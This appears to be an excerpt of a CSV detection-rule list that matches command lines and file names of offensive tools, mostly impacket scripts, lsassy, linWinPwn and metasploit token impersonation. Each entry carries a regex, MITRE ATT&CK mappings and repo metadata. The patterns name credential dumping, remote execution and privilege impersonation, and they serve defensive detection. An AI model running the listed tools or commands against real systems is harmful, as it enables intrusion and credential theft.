"*impacket.smbconnection*",".{0,1000}impacket\.smbconnection.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","135","13","2024-05-01T16:30:51Z","2021-06-09T19:27:08Z" "*impacket/*.py*",".{0,1000}impacket\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket:latest*",".{0,1000}impacket\:latest.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket__init__*",".{0,1000}impacket__init__.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket_findDelegation*",".{0,1000}impacket_findDelegation.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*impacket_rpcdump_output_*",".{0,1000}impacket_rpcdump_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*impacket-atexec*",".{0,1000}impacket\-atexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-dcomexec*",".{0,1000}impacket\-dcomexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketfile.py*",".{0,1000}impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*impacket-GetADUsers*",".{0,1000}impacket\-GetADUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-GetNPUsers*",".{0,1000}impacket\-GetNPUsers.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-getST*",".{0,1000}impacket\-getST.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-getTGT*",".{0,1000}impacket\-getTGT.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketldap_shell*",".{0,1000}impacketldap_shell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketlogger*",".{0,1000}impacketlogger.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-lookupsid*",".{0,1000}impacket\-lookupsid.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketmssqlshell*",".{0,1000}impacketmssqlshell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-netview*",".{0,1000}impacket\-netview.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketntlmrelayx*",".{0,1000}impacketntlmrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketos_ident*",".{0,1000}impacketos_ident.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-psexec*",".{0,1000}impacket\-psexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketremcomsvc*",".{0,1000}impacketremcomsvc.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketrpcdatabase*",".{0,1000}impacketrpcdatabase.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-samrdump*",".{0,1000}impacket\-samrdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketsecretsdump*",".{0,1000}impacketsecretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketserviceinstall*",".{0,1000}impacketserviceinstall.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-services*",".{0,1000}impacket\-services.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketsmbclient*",".{0,1000}impacketsmbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-smbclient*",".{0,1000}impacket\-smbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-smbserver*",".{0,1000}impacket\-smbserver.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-ticketer*",".{0,1000}impacket\-ticketer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacketutils*",".{0,1000}impacketutils.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ImpactDecoder*",".{0,1000}ImpactDecoder.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ImpactPacket*",".{0,1000}ImpactPacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Impersonate.exe adduser *",".{0,1000}Impersonate\.exe\sadduser\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*Impersonate.exe exec *",".{0,1000}Impersonate\.exe\sexec\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*Impersonate.exe list*",".{0,1000}Impersonate\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*impersonate_token *Administrator*",".{0,1000}impersonate_token\s.{0,1000}Administrator.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" "*impersonate_token *BUILTIN\Administrators*",".{0,1000}impersonate_token\s.{0,1000}BUILTIN\\Administrators.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 